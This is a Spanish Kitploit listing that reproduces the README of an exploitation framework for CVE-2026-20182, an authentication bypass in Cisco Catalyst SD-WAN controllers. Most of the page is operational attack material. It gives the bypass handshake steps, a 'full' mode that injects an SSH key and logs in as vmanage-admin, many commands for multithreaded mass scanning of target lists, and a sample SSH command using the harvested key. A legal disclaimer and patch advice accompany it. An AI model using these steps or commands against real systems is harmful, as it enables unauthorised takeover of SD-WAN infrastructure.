Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2026-20182 — Omisión de autenticación de peering de Cisco Catalyst SD-WAN | Kitploit
Herramientas/GitHubGitHub/nxploited/cve-2026-20182
Autenticación y AutorizaciónAnálisis de VulnerabilidadesExplotaciónSeguridad de RedesPruebas de PenetraciónRed Teaming
GitHubnxploited/cve-2026-20182

CVE-2026-20182

Omisión de autenticación de peering de Cisco Catalyst SD-WAN

Ver Repositorio
12hace 2 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2026-20182

Omisión de autenticación de peering en Cisco Catalyst SD-WAN

CVE-2026-20182 — Omisión de autenticación de peering en Cisco Catalyst SD-WAN

Herramienta de evaluación para pruebas autorizadas de la omisión de autenticación de peering en Cisco Catalyst SD-WAN Controller / Manager (CVE-2026-20182).

CVECVE-2026-20182
GravedadCrítica (CVSS 10.0)
CVSS 3.1AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
ProductoCisco Catalyst SD-WAN Controller (anteriormente vSmart) · Cisco Catalyst SD-WAN Manager (anteriormente vManage)
ProblemaEl mecanismo de autenticación de peering no se aplica correctamente
ScriptCVE-2026-20182.py

Resumen de la vulnerabilidad

Aviso de mayo de 2026: Un fallo en el handshake de conexión de control / autenticación de peering permite que un atacante remoto no autenticado omita la autenticación y obtenga acceso interno con privilegios elevados en los sistemas afectados.

Un atacante envía solicitudes manipuladas al sistema afectado. Si tiene éxito, el atacante puede autenticarse como una cuenta interna, con privilegios elevados y no root y alcanzar NETCONF, lo que permite manipular la configuración del fabric de SD-WAN.

Recomendación: Aplique los parches de seguridad de Cisco según las indicaciones oficiales del proveedor. Restrinja la exposición del plano de gestión, supervise las conexiones del plano de control y audite los controladores SD-WAN para detectar cambios de configuración no autorizados.


Contacto

Telegram: @KNxploited


Vista previa de consola

Consola de operaciones de CVE-2026-20182


Herramienta: CVE-2026-20182.py

Marco de explotación en Python 3 para CVE-2026-20182 contra vdaemon de Cisco SD-WAN (UDP/DTLS 12346).

Qué hace (paso a paso)

Respaldo de fabric: Ante TEAR_DOWN o discrepancia de parámetros, reintenta con los valores alternativos de domain/site (1,100), (1,1), (0,0) a menos que se use --no-fallback.


Niveles de resultados (leer con atención)

Importante

  • El modo check → como máximo nivel 03 (sonda de bypass). No es prueba de explotación completa.
  • El modo full → apunta al nivel 01 (ssh_verified).
  • https://host en la lista → solo sugerencia web TCP (80/443). No es DTLS UDP en el 443.

Requisitos

root@kitploit:~
pip install -r requirements.txt

OpenSSL (sistema)

Windows

  1. Instale Win64 OpenSSL 3.x o equivalente
  2. Agregue bin\ al PATH o establezca:
root@kitploit:~
OPENSSL_HOME=C:\Program Files\OpenSSL-Win64

Linux

root@kitploit:~
# Debian/Ubuntu
sudo apt install libssl3 openssl
export LD_LIBRARY_PATH=/usr/lib/x86_64-linux-gnu:$LD_LIBRARY_PATH

La herramienta sale al inicio si no se puede cargar OpenSSL.


Inicio rápido

Menú interactivo (predeterminado)

root@kitploit:~
python CVE-2026-20182.py
  • Configure las opciones 1–11 y luego 0 = INICIAR ESCANEO
  • Modo de ejecución predeterminado: check (sonda de bypass segura)

No interactivo (automatización)

root@kitploit:~
python CVE-2026-20182.py -y

Modos de ejecución

CHECK — solo sonda de bypass

root@kitploit:~
python CVE-2026-20182.py -y --mode check

FULL — inyectar clave y verificar SSH (solo objetivos autorizados)

root@kitploit:~
python CVE-2026-20182.py -y --mode full

Referencia de CLI (todas las opciones y ejemplos)

Objetivos y trabajadores

-f / --file — lista de objetivos (predeterminado: targets.txt)

root@kitploit:~
python CVE-2026-20182.py -y -f my_controllers.txt --mode check

-t / --threads — subprocesos de trabajo (1–200, predeterminado 12)

root@kitploit:~
python CVE-2026-20182.py -y -f targets.txt -t 30 --mode check

--domain — DOMAIN_ID predeterminado cuando no está en la lista (predeterminado: 1)

root@kitploit:~
python CVE-2026-20182.py -y -f targets.txt --domain 1 --site 100 --mode check

--site — SITE_ID predeterminado cuando no está en la lista (predeterminado: 100)

root@kitploit:~
python CVE-2026-20182.py -y -f targets.txt --domain 1 --site 50 --mode full

Modo y automatización

--mode — check | full

root@kitploit:~
python CVE-2026-20182.py -y --mode full -f targets.txt

-y / --yes — omitir el menú interactivo; usar solo valores de CLI

root@kitploit:~
python CVE-2026-20182.py -y -f targets.txt --mode check -t 20

Verificación SSH

--no-ssh-verify — omitir la prueba SSH posterior a la inyección (no recomendado en modo full)

root@kitploit:~
python CVE-2026-20182.py -y --mode full --no-ssh-verify -f targets.txt

--verify-ssh22 — probar también TCP 22 después de 830

root@kitploit:~
python CVE-2026-20182.py -y --mode full --verify-ssh22 -f targets.txt

UDP / fabric

--no-try-list-udp — solo UDP 12346; ignorar :port de la lista

root@kitploit:~
python CVE-2026-20182.py -y --no-try-list-udp -f targets.txt --mode check

--extra-udp-ports — laboratorio: puertos UDP adicionales en cada host

root@kitploit:~
python CVE-2026-20182.py -y --extra-udp-ports 8080,8443 -f targets.txt --mode check

--no-fallback — deshabilitar el reintento domain/site ante TEAR_DOWN

root@kitploit:~
python CVE-2026-20182.py -y --no-fallback -f targets.txt --mode full

Registro

-v / --verbose — registrar cada mensaje de protocolo TX/RX

root@kitploit:~
python CVE-2026-20182.py -y -v -f targets.txt --mode check

Menú interactivo (cuando se omite -y)


Formato de targets.txt

Un objetivo por línea. Las líneas que empiezan por # se ignoran.

Archivo de ejemplo

root@kitploit:~
# Lab controllers — authorized only
10.10.10.1
10.10.10.2:12346:1:100
https://sdwan-controller.example.com
10.10.10.4:12346:1:1

No compatible: IPv6 (solo IPv4 / nombre de host).


Archivos de salida

Ejemplo de comando SSH (nivel 01)

root@kitploit:~
ssh -i "sdwan_keys/sdwan_10_10_10_1_12346_d1_s100.pem" [email protected] -p 830 -N

Flujos de trabajo recomendados

1) Cribar muchos hosts (rápido)

root@kitploit:~
python CVE-2026-20182.py -y -f targets.txt --mode check -t 24

Revise cisco_sdwan_03_bypass_only.jsonl y las estadísticas en vivo Solo bypass.

2) Confirmar la explotación en los hosts preseleccionados

root@kitploit:~
python CVE-2026-20182.py -y -f confirmed_hosts.txt --mode full -t 8

Revise cisco_sdwan_01_confirmed_ssh.jsonl — único archivo con ssh_verified: true.

3) Depurar un solo host (modo verboso)

root@kitploit:~
python CVE-2026-20182.py -y -f single.txt --mode full -t 1 -v --no-fallback

Telemetría en vivo (durante el escaneo)


Notas operativas

  • El modo predeterminado es check — no escribe claves ni prueba SSH por sí mismo.
  • Éxito real = ssh_verified=true solo en modo full.
  • Sistema parcheado / fabric incorrecto → a menudo TEAR_DOWN después de CHALLENGE_ACK; active el respaldo de fabric o corrija domain/site en la lista.
  • El firewall debe permitir UDP/12346 (y cualquier puerto UDP adicional de la lista) desde su escáner hasta el controlador.
  • No haga commit de sdwan_keys/ ni de los resultados del escaneo en repositorios públicos.

Aviso legal

Este software es solo para investigación de seguridad autorizada, evaluación defensiva y educación.

Debe tener permiso explícito por escrito para probar cualquier sistema que no posea u opere. El acceso no autorizado a sistemas informáticos es ilegal. El autor no es responsable del mal uso, daños o consecuencias legales derivados del uso de esta herramienta.

Úselo únicamente en sistemas y redes donde esté explícitamente autorizado para realizar pruebas de seguridad.


Por: Nxploited ( Khaled Alenazi )

Descargar herramienta
ElementoDetalle
Vector de ataqueRed
Privilegios requeridosNinguno
Interacción del usuarioNinguna
AlcanceCambiado
ImpactoConfidencialidad, integridad y disponibilidad: alta
PasoFaseDescripción
1Cargar objetivosAnaliza targets.txt y combina duplicados por (host, domain_id, site_id)
2Comprobación previa de OpenSSLCarga las bibliotecas compartidas de OpenSSL 3.x/4.x para DTLS personalizado
3Conexión DTLSConecta al puerto UDP objetivo (siempre 12346 primero y luego los puertos opcionales de la lista)
4CHALLENGERecibe el CHALLENGE (0x08) del servidor
5CHALLENGE_ACKEnvía un CHALLENGE_ACK manipulado como vHub (tipo 2) — omisión de autenticación
6HelloCompleta el intercambio Hello — confirma la ruta de omisión
7aModo CHECKDetenerse aquí — registrar solo bypass / Hello OK (sin claves, sin SSH)
7bModo FULLInyectar la clave pública SSH mediante VMANAGE_TO_PEER
8ACK de inyecciónEsperar REGISTER_TO_VMANAGE (0x0D) como confirmación de protocolo
9Verificación SSHProbar el inicio de sesión como vmanage-admin en TCP 830 (NETCONF), opcionalmente 22
10SalidaClasificar los hallazgos en archivos por niveles + lista de comandos legible
NivelArchivoSignificado
01 — SSH confirmadocisco_sdwan_01_confirmed_ssh.jsonlssh_verified=true — único nivel tratado como prueba de compromiso total
02 — Solo inyección ACKcisco_sdwan_02_inject_ack_only.jsonlEl protocolo aceptó la inyección de clave; falló el inicio de sesión SSH
03 — Solo bypasscisco_sdwan_03_bypass_only.jsonlHello/bypass correctos; sin inyección confirmada
RequisitoNotas
Python3.9+
pipcryptography, rich
OpenSSLBibliotecas compartidas 3.x o 4.x (libssl + libcrypto) — obligatorio
ModoOpciónInyección SSHVerificación SSHÚsalo cuando
CHECK--mode check (predeterminado)NoNoCribado masivo, detección de bypass
FULL--mode fullSíSí (salvo --no-ssh-verify)Prueba de compromiso
#Opción
1Archivo de objetivos
2Subprocesos de trabajo
3DOMAIN_ID predeterminado
4SITE_ID predeterminado
5Modo: check / full
6Reintento automático de fabric ante TEAR_DOWN
7Registro de protocolo verboso
8Verificación SSH después de la inyección
9Verificar también SSH :22
10Intentar puertos UDP explícitos de la lista
11Puertos UDP adicionales (laboratorio)
12Mostrar ayuda sobre el formato de la lista
0▶ INICIAR ESCANEO
FormatoEjemploComportamiento
IP / nombre de host10.0.0.1UDP 12346 + domain/site predeterminados
IP + puerto UDP10.0.0.2:12346Probar también el puerto UDP de la lista
IP + puerto + domain + site10.0.0.3:12346:1:100Tupla de fabric completa
URL HTTPShttps://10.0.0.4Solo sugerencia de host + TCP 443 (no UDP/443)
URL HTTPhttp://10.0.0.5Solo sugerencia TCP 80
URL UDPudp://10.0.0.6:12346UDP explícito
Separado por tabulador/comas10.0.0.7 12346 1 100Igual que el formato de cuatro campos
Clave=valor10.0.0.8;port=12346;domain=1;site=100Sintaxis KV con punto y coma
ArchivoContenido
cisco_sdwan_results.jsonlResultado JSON bruto por intento
cisco_sdwan_success.txtLíneas SSH confirmadas (separadas por tabulador)
cisco_sdwan_01_confirmed_ssh.jsonlNivel 01 — SSH verificado
cisco_sdwan_02_inject_ack_only.jsonlNivel 02 — inyección ACK, SSH falló
cisco_sdwan_03_bypass_only.jsonlNivel 03 — solo bypass / Hello
cisco_sdwan_commands.txtComandos SSH legibles
cisco_sdwan_findings.jsonResumen de sesión y contadores
sdwan_keys/Claves privadas generadas (modo full)
ContadorSignificado
ProgresoObjetivos completados / total
SSH verificadoRecuento del nivel 01
Inyección ACKRecuento del nivel 02
Solo bypassRecuento del nivel 03
FallidosErrores / sin bypass